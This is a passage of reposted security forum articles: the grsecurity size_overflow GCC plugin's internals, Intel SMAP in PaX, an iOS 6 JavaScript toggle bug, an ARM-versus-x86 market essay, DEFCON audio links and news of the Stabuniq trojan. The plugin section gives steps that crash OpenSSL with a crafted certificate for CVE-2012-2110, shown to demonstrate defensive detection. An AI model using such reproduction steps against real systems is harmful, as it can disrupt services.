detects an overflow then the report_size_overflow function will be called instead of executing the following stmt. The marked function's parameter is replaced with a variable cast down from its double wide clone so that gcc can potentially optimize out the stmts computing the original variable. If we uncomment the print_the_code_insertions function call in the insert_check_size_overflow function then the plugin will print out this message during compilation: "Integer size_overflow check applied here." This message isn't too useful because later passes in gcc will optimize out about 6 out of 10 insertions. If anyone is interested in the insertion count after optimizations then try this command (on the kernel): objdump -drw vmlinux | grep "call.*report_size_overflow" | wc -l report_size_overflow The plugin creates the report_size_overflow declaration in the start_unit_callback, but the definition is always in the current program. The plugin inserts only the report_size_overflow calls. This is a no-return function. This function prints out the file name, the function name and the line number of the detected overflow. If the stmt's line number is not available in gcc then it prints out the caller's start line number. The last two strings are only debug information. The report_size_overflow function's message looks like this (without PaX it uses SIZE_OVERFLOW instead of PAX): PAX: size overflow detected in function main tests/main12.c:27 cicus.4_21 (max) In the kernel the report_size_overflow function is in fs/exec.c. The overflow message is sent to dmesg along with a stack backtrace and then it sends a SIGKILL to the process that tiggered the overflow. In openssl the report_size_overflow function is in crypto/mem.c. The overflow message is sent to syslog and the triggering process is sent a SIGSEGV. Plugin internals through a simple example The source code (test.c): extern void *malloc(size_t size) __attribute__((size_overflow(1))); void * __attribute__((size_overflow(1))) coolmalloc(size_t size) { return malloc(size); } void report_size_overflow(const char *file, unsigned int line, const char *func, const char *ssa_name) { printf("SIZE_OVERFLOW: size overflow detected in function %s %s:%u %s", func, file, line, ssa_name); _exit(1); } int main(int argc, char *argv[]) { unsigned long a; unsigned long b; unsigned long c = 10; a = strtoul(argv[1], NULL, 0); b = strtoul(argv[2], NULL, 0); c = c + a * b; return printf("%p\n", coolmalloc(c)); } Compile the plugin: gcc -I`gcc -print-file-name=plugin`/include/c-family -I`gcc -print-file-name=plugin`/include -fPIC -shared -O2 -o size_overflow_plugin.so size_overflow_plugin.c Compile test.c with the plugin and dump its ssa representations: gcc -fplugin=size_overflow_plugin.so test.c -O2 -fdump-tree-all Each dumpable gcc pass is dumped by -fdump-tree-all. This blog post focuses on the ssa and the size_overflow passes. The marked function is coolmalloc, the traced parameter is c_12. The main function's ssa representaton is below, just before executing the size_overflow pass (test.c.*.ssa*): main (int argc, char * * argv) { long unsigned int c; long unsigned int b; long unsigned int a; const char * restrict D.3291; void * D.3290; int D.3289; long unsigned int D.3288; const char * restrict D.3287; char * D.3286; char * * D.3285; const char * restrict D.3284; char * D.3283; char * * D.3282; <bb 2>: c_1 = 10; D.3282_3 = argv_2(D) + 4; D.3283_4 = *D.3282_3; D.3284_5 = (const char * restrict) D.3283_4; a_6 = strtoul (D.3284_5, 0B, 0); D.3285_7 = argv_2(D) + 8; D.3286_8 = *D.3285_7; D.3287_9 = (const char * restrict) D.3286_8; b_10 = strtoul (D.3287_9, 0B, 0); D.3288_11 = a_6 * b_10; c_12 = D.3288_11 + c_1; D.3290_13 = coolmalloc (c_12); D.3291_14 = (const char * restrict) &"%p\n"[0]; D.3289_15 = printf (D.3291_14, D.3290_13); return D.3289_15; } After the size_overflow pass on a 32 bit arch (test.c.*size_overflow*): main (int argc, char * * argv) { long unsigned int cicus.7; long long unsigned int cicus.6; long long unsigned int cicus.5; long long unsigned int cicus.4; long long unsigned int cicus.3; long long unsigned int cicus.2; long unsigned int c; long unsigned int b; long unsigned int a; const char * restrict D.3291; void * D.3290; int D.3289; long unsigned int D.3288; const char * restrict D.3287; char * D.3286; char * * D.3285; const char * restrict D.3284; char * D.3283; char * * D.3282; <bb 2>: c_1 = 10; cicus.5_24 = (long long unsigned int) c_1; D.3282_3 = argv_2(D) + 4; D.3283_4 = *D.3282_3; D.3284_5 = (const char * restrict) D.3283_4; a_6 = strtoul (D.3284_5, 0B, 0); cicus.2_21 = (long long unsigned int) a_6; D.3285_7 = argv_2(D) + 8; D.3286_8 = *D.3285_7; D.3287_9 = (const char * restrict) D.3286_8; b_10 = strtoul (D.3287_9, 0B, 0); cicus.3_22 = (long long unsigned int) b_10; D.3288_11 = a_6 * b_10; cicus.4_23 = cicus.2_21 * cicus.3_22; c_12 = D.3288_11 + c_1; cicus.6_25 = cicus.4_23 + cicus.5_24; cicus.7_26 = (long unsigned int) cicus.6_25; if (cicus.6_25 > 4294967295) goto <bb 3>; else goto <bb 4>; <bb 3>: report_size_overflow ("test.c", 28, "main", "cicus.6_25 (max)\n"); <bb 4>: D.3290_13 = coolmalloc (cicus.7_26); D.3291_14 = (const char * restrict) &"%p\n"[0]; D.3289_15 = printf (D.3291_14, D.3290_13); return D.3289_15; } Some problems encountered during development gcc intentional overflow: Gcc can produce unsigned overflows while transforming expressions. e.g., it can transform constants that will produce the correct result with unsigned overflow on the given type. (e.g., a-1 -> a+4294967295) The plugin used to detect this (false positive) overflow at runtime . The solution is to not duplicate such stmts that contain constants. Instead, the plugin inserts an overflow check for the non-constant rhs before that stmt and uses its lhs (cast to the double wide type) in later duplication. For example on 32 bit: coolmalloc(a * b - 1 + argc) before size_overflow plugin:... D.4416_10 = a_5 * b_9; D.4418_13 = D.4416_10 + argc.0_12; D.4419_14 = D.4418_13 + 4294967295; D.4420_15 = coolmalloc (D.4419_14); ... after size_overflow plugin: ... D.4416_10 = a_5 * b_9; cicus.7_25 = cicus.4_22 * cicus.6_24; D.4418_13 = D.4416_10 + argc.0_12; cicus.9_27 = cicus.7_25 + cicus.8_26; cicus.10_28 = (unsigned int) cicus.9_27; cicus.11_29 = (long long unsigned int) cicus.9_27; if (cicus.11_29 > 4294967295) goto <bb 3>; else goto <bb 4>; <bb 3>: report_size_overflow ("test.c", 28, "main"); <bb 4>: D.4419_14 = cicus.10_28 + 4294967295; cicus.12_30 = (long long int) D.4419_14; ... when a size parameter is used for more than one purpose (not just for size): The plugin cannot recognize this case. When I get a false positive report I remove the function from the hash table. type cast from gcc or the programmer causing intentional overflows. This is the reason for the TODOs in the table above Detecting a real security issue I'll demonstrate the plugin on an openssl 1.0.0 bug (CVE-2012-2110). To reproduce the overflow with this: http://lock.cmpxchg8b.com/openssl-1.0.1-testcase-32bit.crt.gz Download the plugin source (or use the ebuild) from here: https://grsecurity.net/~ephox/overflow_plugin/ Download the openssl patch (that contains the report_size_overflow function): http://grsecurity.net/~ephox/overflow_plugin/userland_patches/openssl-1.0.0/ Compile openssl with the plugin (see the README) after that we can reproduce the bug: openssl-1.0.0.h/bin $ ./openssl version OpenSSL 1.0.0h 12 Mar 2012 openssl-1.0.0.h/bin $ ./openssl x509 -in ../../openssl-1.0.1-testcase-32bit.crt -text -noout -inform DER Segmentation fault In syslog there is the plugins's message: SIZE_OVERFLOW: size overflow detected in function asn1_d2i_read_bio a_d2i_fp.c:228 cicus.69_205 (max) I'll have more (gentoo) ebuilds if anyone wants to use the plugin in userland (for now only openssl): http://grsecurity.net/~ephox/overflow_plugin/gentoo/ Performance impact hardware: quad core sandy bridge kernel version: 3.5.1 patch: pax-linux-3.5.1-test16.patch overflow checks after optimization (gcc-4.7.1): 931 With the size_overflow plugin disabled: Performance counter stats for 'du -s /test' (10 runs): 4345.283145 task-clock # 0.983 CPUs utilized ( +- 0.12% ) 1,107 context-switches # 0.255 K/sec ( +- 0.09% ) 0 CPU-migrations # 0.000 K/sec ( +-100.00% ) 3,763 page-faults # 0.866 K/sec ( +- 0.13% ) 14,641,126,270 cycles # 3.369 GHz ( +- 0.03% ) 4,228,389,062 stalled-cycles-frontend # 28.88% frontend cycles idle ( +- 0.06% ) 1,962,172,809 stalled-cycles-backend # 13.40% backend cycles idle ( +- 0.23% ) 25,463,911,605 instructions # 1.74 insns per cycle # 0.17 stalled cycles per insn ( +- 0.01% ) 6,968,592,408 branches # 1603.714 M/sec ( +- 0.01% ) 47,230,732 branch-misses # 0.68% of all branches ( +- 0.07% ) 4.419888484 seconds time elapsed ( +- 0.12% ) With the size_overflow plugin enabled: Performance counter stats for 'du -s /test' (10 runs): 4291.088943 task-clock # 0.983 CPUs utilized ( +- 0.08% ) 1,093 context-switches # 0.255 K/sec ( +- 0.08% ) 0 CPU-migrations # 0.000 K/sec 3,761 page-faults # 0.877 K/sec ( +- 0.15% ) 14,481,436,247 cycles # 3.375 GHz ( +- 0.05% ) 4,155,959,526 stalled-cycles-frontend # 28.70% frontend cycles idle ( +- 0.15% ) 2,003,994,250 stalled-cycles-backend # 13.84% backend cycles idle ( +- 0.54% ) 25,436,031,783 instructions # 1.76 insns per cycle # 0.16 stalled cycles per insn ( +- 0.00% ) 6,960,975,325 branches # 1622.193 M/sec ( +- 0.00% ) 47,125,984 branch-misses # 0.68% of all branches ( +- 0.07% ) 4.365185965 seconds time elapsed ( +- 0.08% ) TODO: I don't know why it was faster with the plugin on these tests During compilation it didn't cause too much slowdown (0.077s only). Allyes kernel config statistics after optimization (number of calls to report_size_overflow, gcc-4.6.2) 3.5.0: vmlinux_4.6.x_i386-yes: 2556 vmlinux_4.6.x_x86_64-yes: 2659 3.2.26: vmlinux_4.6.x_i386-yes: 2657 vmlinux_4.6.x_x86_64-yes: 2756 2.6.32.59: vmlinux_4.6.x_i386-yes: 1893 vmlinux_4.6.x_x86_64-yes: 2353 Future plans enable the plugin to compile c++ sources compile the following programs with the plugin glibc: i tried to compile it already but the make system doesn't like my report_size_overflow function, so I'll try it later glib syslog-ng: I don't yet know where to report the overflow message (chicken and egg problem ) firefox chromium samba apache php the Android kernel anything with an integer overflow CVE [*]plugin internals plans: print out overflowed value in the report message comments optimization: use unlikely/__builtin_expect for the inserted checks if the expression can be tracked back to the result of a function call then the function's return value should be tracked back as well handle ADDR_EXPR make use of LTO (gcc 4.7+): could get rid of the hash table llvm size_overflow plugin an IPA pass to be able to track back across static functions in a translation unit, it would reduce the hash table handle function pointers handle struct fields fix this side effect: warning: call to 'copy_to_user_overflow' declared with attribute warning: copy_to_user() buffer size is not provably correct solve all the TODO items in the cast handling table If anyone's interested in compiling other userland programs with the plugin then please send the hash table and the patch to me please Sursa: grsecurity forums • View topic - Inside the Size Overflow Plugin
  20. [h=3]Supervisor Mode Access Prevention[/h]by PaX Team » Fri Sep 07, 2012 9:05 pm With the latest release of their Architecture Instruction Set Extensions Programming Reference Intel has finally lifted the veil on a new CPU feature to debut in next year's Haswell line of processors. This new feature is called Supervisor Mode Access Prevention (SMAP) and there's a reason why its name so closely resembles Supervisor Mode Execution Prevention (SMEP), the feature that debuted with Ivy Bridge processors a few months ago. While the purpose of SMEP was to control instruction fetches and code execution from supervisor mode (traditionally used by the kernel component of operating systems), SMAP is concerned with data accesses from supervisor mode. In particular, SMEP, when enabled, prevents code execution from userland memory pages by the kernel (the favourite exploit technique against kernel security bugs), whereas SMAP will prevent unintended data accesses to userland memory. The twist in the story and the reason why these security features couldn't be implemented as one lies in the fact that the kernel does have legitimate need to access data in userland memory at times while no contemporary kernel needs to execute code from there. In other words, while SMEP can be enabled unconditionally by flipping a bit at boot time, SMAP needs more care because it has to be disabled/enabled around legitimate accessor functions in the kernel. Intel has added two new instructions for this very purpose (CLAC/STAC) and repurposed the alignment check status bit in supervisor mode to enable quick switching around SMAP at runtime. This will require more extensive changes in kernel code than SMEP did but the amount of code is still quite managable. Third party kernel modules that don't use the kernel's userland accessor functions will have to take care of switching SMAP on/off themselves. What does SMAP mean for PaX? The situation is similar to last year's SMEP that made efficient implementation of (partial) KERNEXEC possible on amd64 (i386/KERNEXEC continues to rely on segmentation instead which provides better protection than SMEP can). SMAP's analog feature in PaX is called UDEREF which so far couldn't be efficiently implemented on amd64 (once again, i386/UDEREF will continue to rely on segmentation to provide better userland/kernel separation than SMAP can). Beyond allowing an efficient implementation of UDEREF there'll be other uses for SMAP (or perhaps a future variant of it) in PaX: sealed kernel memory whose access is carefully controlled even for kernel code itself. What does SMAP mean for security? Similarly to UDEREF, an SMAP enabled kernel will be prevented from accessing userland memory in unintended ways, e.g., attacker controlled pointers can no longer target userland memory directly, but even simple kernel bugs such as NULL pointer based dereferences will just trigger a CPU exception instead of letting the attacker take over kernel data flow. Coupled with SMEP this means that future exploits against memory corruption bugs will have to entirely rely on targeting kernel memory (which has been the case under UDEREF/KERNEXEC for many years now). This of course means that for reliable exploitation detailed knowledge of runtime kernel memory will become a premium, therefore abusing bugs that leak kernel memory to userland will become the first step towards exploiting memory corruption bugs. While UDEREF and SMAP prevent gratuitous memory leaks, they still have to allow intended userland accesses and that is exactly the escape hatch that several exploits have already targeted and we can expect more in the future. Fortunately we are once again at the forefront of this game with several features that prevent or at least greatly reduce the amount of informaton that can be so leaked from the kernel to userland (HIDESYM, SANITIZE, SIZE_OVERFLOW, STACKLEAK, USERCOPY). TL;DR: Intel implements UDEREF equivalent 6 years after PaX, PaX will make use of it on amd64 for improved performance. Sursa: grsecurity forums • View topic - Supervisor Mode Access Prevention
  21. iOS 6 Javascript Bug Raises Potential Security And Privacy Questions By Istvan Fekete last updated December 23, 2012 iOS 6 Safari has a potentially serious Javascript bug, which could have some serious security and privacy implications. According to a report from AppleInsider, users who toggle off Javascript in the iOS 6 Safari web browser are not totally in the clear. The appearance of a Smart App Banner designed to give developers the ability to promote App Store software within Safari on a certain website, automatically toggles your Javascript back on without notifying the user. You can check out this bug by opening up the Setting app and choosing Safari, then turning off Javascript. Then you can visit this test page using your iPhone's browser. As you will see, it will turn on Javascript, without notifying you. Peter Eckersley, technology products director with digital rights advocacy group, the Electronic Frontier Foundation, said he would characterize such an issue as a "serious privacy and security vulnerability." Neither Eckersley nor the EFF had heard of the bug in iOS 6, nor had they independently tested to confirm that they were able to replicate the issue. But Eckersley said that if the problem is in fact real, it's something that Apple should work to address as quickly as possible. "It is a security issue, it is a privacy issue, and it is a trust issue," Eckersley said. "Can you trust the UI to do what you told it to do? It's certainly a bug that needs to be fixed urgently." According to the report, this issue has existed ever since iOS 6 went public, and the recent updates iOS 6.0.1 and iOS 6.0.2 didn't patch it. Furthermore, the bug isn't iPhone specific, it applies to all iDevices running iOS 6 and even iOS 6.1 beta seems to carry this bug as well. Sursa: iOS 6 Javascript Bug Raises Potential Security And Privacy QuestionsJaxov
  22. The End of x86? An Update by mjfern on December 21, 2012 In October 2010, I predicted the disruption of the x86 architecture, along with its major proponents Intel and AMD. The purpose of this current article is to reassess this prediction in light of recent events. Below, I present the classic signs of disruption (drawing on Christensen’s framework), my original arguments in blockquotes, and then an update. 1. The current technology is overshooting the needs of the mass market. Due to a development trajectory that has followed in lockstep with Moore’s Law, and the emergence of cloud computing, the latest generation of x86 processors now exceed the performance needs of the majority of customers. Because many customers are content with older generation microprocessors, they are holding on to their computers for longer periods of time, or if purchasing new computers, are seeking out machines that contain lower performing and less expensive microprocessors. x86 shipments dropped by 9% in Q3 2012. Furthermore, the expected surge in PC sales (and x86 shipments) in Q4 due to the release of Windows 8 has failed to materialize. NPD data indicates that Windows PCs sales in U.S. retail stores fell a staggering 21% in the four-week period from October 21 to November 17, compared to the same period the previous year. [1] In short, there is now falling demand for x86 processors. Computer buyers are shifting their spending from PCs to next generation computing devices, including smartphones and tablets. 2. A new technology emerges that excels on different dimensions of performance. While the x86 architecture excels on processing power – the number of instructions handled within a given period of time – the ARM architecture excels at energy efficiency. According to Data Respons (datarespons.com, 2010), an “ARM-based system typically uses as little as 2 watts, whereas a fully optimized Intel Atom solution uses 5 or 6 watts.” The ARM architecture also has an advantage in form factor, enabling OEMs to design and produce smaller devices. While Intel has closed the ARM energy efficiency gap with its latest x86 Atom processers, the latest generation ARM-based chips are outperforming their Atom counterparts. And the performance advantage of ARM-based processors is expected through 2013. The ARM architecture also continues to maintain a significant advantage in the area of customization, form factor, and price due to ARM Holding’s unique licensing-based business model. Because of these additional benefits of ARM technology, it’s unlikely that Intel’s energy efficiency gains will significantly affect its short-term market penetration. 3. Because this new technology excels on a different dimension of performance, it initially attracts a new market segment. While x86 is the mainstay technology in PCs, the ARM processor has gained significant market share in the embedded systems and mobile devices markets. ARM-based processors are used in more than 95% of mobile phones (InformationWeek, 2010). And the ARM architecture is now the main choice for deployments of Google’s Android and is the basis of Apple’s A4 system on a chip, which is used in the latest generation iPod Touch and Apple TV, as well as the iPhone 4 and iPad. ARM-based processors continue to dominate smartphones and tablets, with the ARM architecture maintaining a market share of 95% and 98%, respectively. [2] In the first half of 2012, there were just six phones with x86 chips inside (i.e., 0.2% of the worldwide market). And, as of December 2012, there was scarce availability of tablets with x86 processors. [3] A major concern going forward is that Intel is limiting tablet support to Windows 8. 4. Once the new technology gains a foothold in a new market segment, further technology improvements enable it to move up-market, displacing the incumbent technology. With its foothold in the embedded systems and mobile markets, ARM technology continues to improve. The latest generation ARM chip (the Cortex-A15) retains the energy efficiency of its predecessors, but has a clock speed of up to 2.5 GHz, making it competitive with Intel’s chips from the standpoint of processing power. As evidence of ARM’s move up-market, the startup Smooth-Stone recently raised $48m in venture funding to produce energy efficient, high performance chips based on ARM to be used in servers and data centers. I suspect we will begin seeing the ARM architecture in next generation latops, netbooks, and smartphones (e.g., A4 in a MacBook Air). ARM’s latest Cortex-A15 processor is highly competitive with Intel’s Atom line of processors. In a benchmarking analysis, “the [ARM-based] Samsung Exynos 5 Dual…easily beat out all of the tested Intel Atom processors.” And while Intel’s Core i3 processors outperformed the ARM-based processors, the iCore’s performance-per-watt makes it unsuitable for smartphones and tablets. Since energy conservation and cost is a growing concern among manufacturers, IT departments, and consumers, ARM-based chips are also moving upmarket into more demanding devices. While ARM technology hasn’t made much headway in traditional desktop PCs and laptops, it’s been deployed in the latest generation Google Chromebook, produced by Samsung. It’s also the processor of choice in Microsoft’s Surface RT, which is arguably a hybrid device (PC and tablet) given it runs Windows and Office and has a keyboard. Furthermore, ARM’s penetration of the server market is ushering in a new “microserver” era, with support from AMD, Calxeda, Dell, HP, Marvell, Samsung, Texas Instruments, and others (e.g., Applied Micro). [4] 5. The new, disruptive technology looks financially unattractive to established companies, in part because they have a higher cost structure. In 2009, Intel’s costs of sales and operating expenses were a combined $29.6 billion. In contrast, ARM Holdings, the company that develops and supports the ARM architecture, had total expenses (cost of sales and operating) of $259 million. Unlike Intel, ARM does not produce and manufacture chips; instead it licenses its technology to OEMs and other parties and the chips are often manufactured using a contract foundry (e.g., TSMC). Given ARM’s low cost structure, and the competition in the foundry market, “ARM offers a considerably cheaper total solution than the x86 architecture can at present…” (datarespons.com, 2010). Intel is loathe to follow ARM’s licensing model because it would reduce Intel’s revenues and profitability substantially. In the first three quarters of 2012, Intel had revenue of $38.864 billion, operating expenses of $28.509b, and operating income of $11.355b. In contrast, ARM Holdings, with its licensing-based business model, had revenue of $886.88 million, operating expenses of $576.5m, and operating income of $307.12m. ARM Holdings has revenues and profits that are just a fraction (2-3%) of Intel’s. This is the case even though ARM-based processors have a much greater share of the overall processor market. [5] The smartphone and tablet markets, despite their sheer size and growth rates, are financially unattractive in comparison to the PC market. The price point and margins on processors in the mobile markets are significantly lower than that of higher-end PC and server processors. For instance, as of November 2012, the “Atom processor division contribute[d] only around 2% to Intel’s valuation.” In short, the ARM architecture appears to be in the early stages of disrupting x86, not just in the mobile and embedded systems markets, but also in the personal computer and server markets, the strongholds of Intel and AMD. This is evidenced in part by investors’ expectations for ARM’s, Intel’s and AMD’s future performance in microprocessor markets: today ARM Holdings has a price to earnings ratio of 77.93, while Intel and AMD have price to earnings ratios of 10.63 and 4.26, respectively. It doesn’t appear Intel (or AMD) have solved the disruptive threat posed by ARM. The ARM architecture is maintaining its market share in smartphones and tablets, and gaining ground in upmarket devices, from hybrids (Chromebook and Surface RT) to servers. Investors concur with this assessment, as ARM Holdings has a price to earnings ratio of 70.74, while Intel has a price to earnings ratio of 9.22. [6] For Intel and AMD to avoid being disrupted, they must offer customers a microprocessor with comparable (or better) processing power and energy efficiency relative to the latest generation ARM chips, and offer this product to customers at the same (or lower) price point relative to the ARM license plus the costs of manufacturing using a contract foundry. The Intel Atom is a strong move in this direction, but the Atom is facing resistance in the mobile market and emerging thin device markets (e.g., tablets) due to concerns about its energy efficiency, form factor, and price point. While Intel has closed the energy efficiency gap with its latest Atom processors, it still lags in performance and hasn’t dealt with the issues of customization and form factor. It’s likely that its pricing also remains unattractive. Although I don’t have precise data on Intel or ARM’s pricing for comparable processors, one can get an estimate by comparing Intel’s listed processor prices with teardown data from iSuppli. According to this rough analysis, the latest Atom processors range in price from $42-$75, while ARM-based processors have prices (including manufacturing) in the $15-25 range. [7] Therefore, Intel would need to offer a 60%+ discount off list prices to just achieve parity. The x86 architecture is supported by a massive ecosystem of suppliers (e.g., Applied Materials), customers (e.g., Dell), and complements (e.g., Microsoft Windows). If Intel and AMD are not able to fend off ARM, and the ARM architecture does displace x86, it would cause turbulence for a large number of companies. This turbulence is now real and visible. The major companies that makeup the x86 ecosystem, including producers (Intel and AMD), suppliers (e.g., Applied Materials), customers (e.g., Dell and HP), and complements (e.g., Microsoft), are all struggling to gain the confidence of investors. Each has underperformed stock market averages over the last two years and many are now implementing their own ARM-based strategies, remarkably even x86 stalwarts AMD and Microsoft. Meanwhile, Paul Otellini, Intel’s CEO, retired suddenly and unexpectedly, just last month.Intel, in particular, faces a precarious situation. It can harvest its tremendous profits in the PC market for the next several years or it can compete in the next generation of processors by aggressively developing low-margin processors and replicating ARM Holding’s licensing-based business model. [7] It’s a choice between serving a known, highly profitable market (in the shorter-term) and possibly winning in a comparatively unknown, unprofitable market (in the longer-term). As a professional executive or manager, which option would you choose? Thus we have the innovator’s dilemma.Join the discussion on Hacker News.If you’ve read this far, you should follow me on Twitter.— [1] This contrasts significantly with the sales impact from the launch of Windows 7, when sales of Windows PCs rose 49% during the first week Windows 7 was on sale, compared to the previous year. [2] While Apple has an instruction set license to execute ARM commands, it designed its own custom ARM compatible CPU core for the iPhone 5 and iPad 4. [3] Intel reports having 20 tablets in its pipeline for launch by the end of this year. [4] Intel’s efforts to create a new market segment for its x86 microprocessors, such as Ultrabooks, has thus far underperformed expectations. [5] I wasn’t able to find data on Intel processor shipments in 2011, but as a rough comparison, it looks like ARM and its licensees shipped 7.9b processors in 2011, while worldwide PC shipments totalled 352.8m units. In 2011, Intel had a roughly 80% market share in the PC market. [6] AMD had net loss in its latest quarter and thus you cannot compute a price to earnings ratio. [7] Intel could obtain an ARM license and enter the contract foundry business, but analysts expect such a move would also have a significant drag on its margins and profitability. Sursa: The End of x86? An Update
  23. [Audio] Issues with security and networked object system From the Hacker Jeopardy winning team. He will discuss Issues with Security and Networked Object Systems, looking at some of the recent security issues found with activeX and detail some of the potentials and problems with network objects. Topics will include development of objects, distributed objects, standards, ActiveX, corba, and hacking objects. Size 23.3 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Clovis%20-%20Issues%20with%20Security%20and%20Networked%20Object%20Systems%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
  24. [Audio] Packet Sniffing He will define the idea, explain everything from 802.2 frames down to the TCP datagram, and explain the mechanisms (NIT, bpf) that different platforms provide to allow the hack Size 25.2 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Wrangler%20-%20Packet%20Sniffing%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
  25. [h=1]Security researchers identify malware infecting U.S. banks[/h] By Lucian Constantin, IDG News Service Dec 22, 2012 12:36 PM Security researchers from Symantec have identified an information-stealing Trojan program that was used to infect computer servers belonging to various U.S. financial institutions. Dubbed Stabuniq, the Trojan program was found on mail servers, firewalls, proxy servers, and gateways belonging to U.S. financial institutions, including banking firms and credit unions, Symantec software engineer Fred Gutierrez said Friday in a blog post. "Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users," Gutierrez said. "Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions." (Also see "How to Avoid Malware.") Based on a map showing the threat's distribution in the U.S. that was published by Symantec, the vast majority of systems infected with Stabuniq are located in the eastern half of the country, with strong concentrations in the New York and Chicago areas. Compared to other Trojan programs, Stabuniq infected a relatively small number of computers, which seems to suggest that its authors might have targeted specific individuals and organizations, Gutierrez said. The malware was distributed using a combination of spam emails and malicious websites that hosted Web exploit toolkits. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java. Once installed, the Stabuniq Trojan program collects information about the compromised computer, like its name, running processes, OS and service pack version, assigned IP (Internet Protocol) address and sends this information to command-and-control (C&C) servers operated by the attackers. "At this stage we believe the malware authors may simply be gathering information," Gutierrez said. Sursa: Security researchers identify malware infecting U.S. banks | PCWorld
×
×
  • Create New...